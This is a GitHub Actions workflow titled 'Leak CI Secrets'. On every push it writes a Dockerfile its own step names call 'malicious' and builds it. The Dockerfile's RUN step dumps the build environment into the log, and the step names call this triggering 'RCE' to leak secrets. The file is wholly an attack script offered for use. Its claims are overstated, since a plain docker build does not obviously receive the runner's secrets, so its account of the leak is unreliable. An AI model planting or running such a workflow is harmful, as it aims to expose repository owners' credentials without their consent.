name: Leak CI Secrets

on:
  push:

jobs:
  leak-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Create malicious Dockerfile
        run: |
          echo -e "FROM alpine\nRUN env > /env_dump && cat /env_dump" > Dockerfile

      - name: Build Dockerfile to trigger RCE and leak secrets
        run: |
          docker build -t hacked-image .
